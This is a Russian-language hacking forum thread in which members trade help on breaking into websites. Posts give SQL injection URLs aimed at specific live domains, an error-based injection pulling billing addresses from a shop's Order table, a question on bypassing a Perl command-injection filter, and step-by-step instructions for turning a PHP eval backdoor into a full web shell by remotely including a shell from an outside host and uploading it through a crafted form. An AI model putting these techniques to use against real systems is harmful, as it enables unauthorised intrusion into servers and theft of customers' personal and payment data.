Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    код странички на перле:

    Code:
    $paramX =~s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
    
    if ($paramX "") {
        my $status=`$xx_cgidir/xyz.pl -m -e $paramX`;
    
    возможен ли обход фильтра и исполнение кода в ос ?
     
  2. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Хеш, мд5 или мд5(мд5) - неизвестно. Вариант - брутить.
     
  3. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    на сайте есть скуль. я подобрал колличество строк. но после этого начало выдавать.

    Application uses a value of the wrong type for the current operation.

    А на точто неверное кол-во столбцов ругаться перестало. О чем это может говорить?Пробывал вставлять version() результат такой же

    запрос такого вида
    http://megamegamegeporn.gov/latest.asp?ID=&offset=&prod_id=8896%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,version()--
     
    #11503 Darren, 21 Feb 2010
    Last edited: 21 Feb 2010
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=13078+union+select+1,2,3,4,@@version,6,7,8,9--+

    Скобки не используй и крути
     
    1 person likes this.
  5. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
    PHP:
    <?php eval($_GET["cmd"]); ?>
    какой запрос надо составить?
     
  6. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Заливаешь свой шелл в формате .txt куда угодно, затем выполняешь
    script.php?cmd=include("http://yoursite.com/shell.txt");
    Затем через шелл льешь его в нужную папку на целевой сайт.
     
    1 person likes this.
  7. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Создаешь у себя на компе файл lypapam.html
    PHP:
     <form enctype=multipart/form-data method=post action="http://lala/shell.php?cmd=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form
    ссылку до переменной http://lala/shell.php?cmd= - редактируешь под себя
    открываешь браузером lypapam.html, прикрепляешь шелл и клик на "отправить")
    шелл с таким же именем появится в папке с shell.php
     
    2 people like this.
  8. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,021
    Likes Received:
    129
    Reputations:
    23
    ребят, подскажите пожалуйста..
    тут копался и в одном сайте при переходе с одного страницы на другую - выдал ошибку:
    Code:
    Warning: include(../news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\[B]site.com[/B]\httpdocs\biography\index.php on line 107
    как я понял - раскрытье путей..
    как можно "эксплуатировать" эту ошибку ?
     
  9. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Линк плз в студию.
    Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла
     
  10. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,021
    Likes Received:
    129
    Reputations:
    23
    :D линк могу в личку кинуть, но хочется сам что то делать и понять.. сколько буду тут своими вопросами надоедать )))
     
    2 people like this.
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,043
    Likes Received:
    604
    Reputations:
    690
    можно реализовать include ...
     
    _________________________
  12. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,021
    Likes Received:
    129
    Reputations:
    23
    shell_c0de
    Strilo4ka


    эта ошибка как бы в нижнем части появлается, в колонке вроде новостей.. мне кажется недоделанный скрипт. Вот даже когда захожу в титульную страницу - опять там эта ошибка :)
    вот так выглядет общий вид:
    Code:
    Warning: include(news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
    
    Warning: include() [function.include]: Failed opening 'news.php' for inclusion (include_path='.;./includes;./pear') in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
    И как составить LFI ?
     
  13. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Что за бред? Если в качестве пользовательских параметров не передаются данные, используемые для инклуда, это не уязвимость, а лишь раскрытие путей.
     
    1 person likes this.
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,008
    Likes Received:
    996
    Reputations:
    155
    Не смотрев на этот сайт, я могу сказать, что эта ошибка возникает потому, что файла news.php нету. И это всего лишь раскрытие... Так что не надо тут выдумывать, что это инклуд. И рассказывать о том, что ты знаешь о фильтрах, еще и MQ совать сюда. И еще, скажи - причем здесь /etc/shadow и /etc/passwd? Ты бы еще про мороженое тут написал. Этого не надо! Человек задал конкретный вопрос, если знаешь конкретный ответ - отвечай, нет - пройди мимо. Еще раз говорю, НЕ НАДО писать здесь о том, что ты знаешь, и строить из себя "умного".

    PS:
    Отличный ответ.
     
    2 people like this.
  15. 3blK0B

    3blK0B Member

    Joined:
    28 Sep 2009
    Messages:
    6
    Likes Received:
    8
    Reputations:
    9
    Ошибка при получении данных из таблицы Order

    http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=(select+top+1+orderCardBillAddress1+from+Order)--

    При попытке получить данные их таблицы Order выдает ошибку:
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Incorrect syntax near the keyword 'Order'.
    /cart.asp, line 352

    я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
     
  16. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,021
    Likes Received:
    129
    Reputations:
    23
    mailbrush
    :D А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате!

    Strilo4ka

    Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может.

    -------------

    И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали :)
    Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ?
    Если логично дуать, то там стоит MSSQL :) хотя.. может и нет..
     
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php
    Там типа вот этого
    PHP:
    <?php
    include "news.php";
    ?>
    а не
    PHP:
    <?php
    include $_GET[page];
    ?>
    т.е. на запрос повлиять нельзя.
    3blK0B, читай http://forum.antichat.ru/thread30501.html
     
    #11517 SeNaP, 22 Feb 2010
    Last edited: 22 Feb 2010
  18. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,021
    Likes Received:
    129
    Reputations:
    23
    SeNaP
    хмм. так и понял, что это не уязвимость :)
    вот пробую такие комбинации:
    Code:
    http://www.site.com/index.php? it=1' or 1=(select db_name())--
    http://www.site.com/index.php?it=1'
    http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
    все вкидывают на главную страницу и никаких ошибок.
    может там не MSSQL ? или все же хорошо защищен от иньекции ?
     
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20

    на

    http://www.site.com/index.php? it=1'
    or
    http://www.site.com/index.php? it=-1'
    что выдаёт?
     
  20. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    from [order], from "order"
     
Loading...
Thread Status:
Not open for further replies.